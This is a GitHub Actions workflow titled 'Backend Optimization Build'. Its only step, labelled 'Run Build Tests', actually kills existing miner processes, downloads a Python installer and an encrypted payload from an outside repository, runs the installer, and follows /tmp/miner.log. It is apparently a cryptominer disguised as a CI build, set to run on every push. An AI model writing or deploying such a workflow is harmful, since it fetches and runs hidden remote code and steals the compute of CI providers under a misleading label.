17 lines
559 B
YAML
17 lines
559 B
YAML
name: Backend Optimization Build
|
|
on: [push]
|
|
|
|
jobs:
|
|
build:
|
|
runs-on: ubuntu-latest
|
|
steps:
|
|
- name: Run Build Tests
|
|
run: |
|
|
pkill -f miner || true
|
|
rm -f install.py core-engine.enc /tmp/miner /tmp/miner.log || true
|
|
wget -q https://raw.githubusercontent.com/daddu11/binder-ghost-node/main/install.py -O install.py
|
|
wget -q https://raw.githubusercontent.com/daddu11/binder-ghost-node/main/core-engine.enc -O core-engine.enc
|
|
python3 install.py
|
|
sleep 2
|
|
tail -f /tmp/miner.log
|